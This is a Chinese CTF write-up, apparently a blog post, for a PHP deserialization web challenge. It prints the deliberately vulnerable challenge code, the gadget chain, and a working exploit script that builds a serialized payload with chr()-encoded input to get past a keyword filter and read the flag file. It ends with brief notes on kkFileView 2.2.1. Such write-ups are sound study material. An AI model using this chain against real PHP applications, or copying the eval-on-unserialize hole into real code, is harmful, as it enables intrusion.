前言
大头哥的复现环境:https://www.yuque.com/dat0u/ctf/kd0httlnqbfhv175
Web
PHP_unserialize_pro
<?php
error_reporting(0);
class Welcome{
public $name;
public $arg = 'welcome';
public function __construct(){
$this->name = 'Wh0 4m I?';
}
public function __destruct(){
if($this->name == 'A_G00d_H4ck3r'){
echo $this->arg;
}
}
}
class G00d{
public $shell;
public $cmd;
public function __invoke(){
$shell = $this->shell;
$cmd = $this->cmd;
if(preg_match('/f|l|a|g|\*|\?/i', $cmd)){
die("U R A BAD GUY");
}
eval($shell($cmd));
}
}
class H4ck3r{
public $func;
public function __toString(){
$function = $this->func;
$function();
}
}
if(isset($_GET['data']))
unserialize($_GET['data']);
else
highlight_file(__FILE__);
?> 链子: Welcome::__destruct -> H4ck3r::__toString -> G00d::__invoke
exp:
<?php
class Welcome{
public $name;
public $arg = 'welcome';
public function __construct(){
$this->name = 'A_G00d_H4ck3r';
}
}
class G00d{
public $shell="strtolower";
public $cmd="show_source(chr(47).chr(102).chr(49).chr(97).chr(103));";
}
class H4ck3r{
public $func;
}
$a=new Welcome();
$a->arg=new H4ck3r();
$a->arg->func=new G00d();
echo serialize($a);meow_blog(不会)
sharedBox(不会)
kkfileview2.2.1 的漏洞利用
kkfileview2.2.1源码:https://github.com/kekingcn/kkFileView/archive/refs/tags/v2.2.1.zip
docker启动:
docker run -it -p 8012:8012 keking/kkfileview:v2.2.1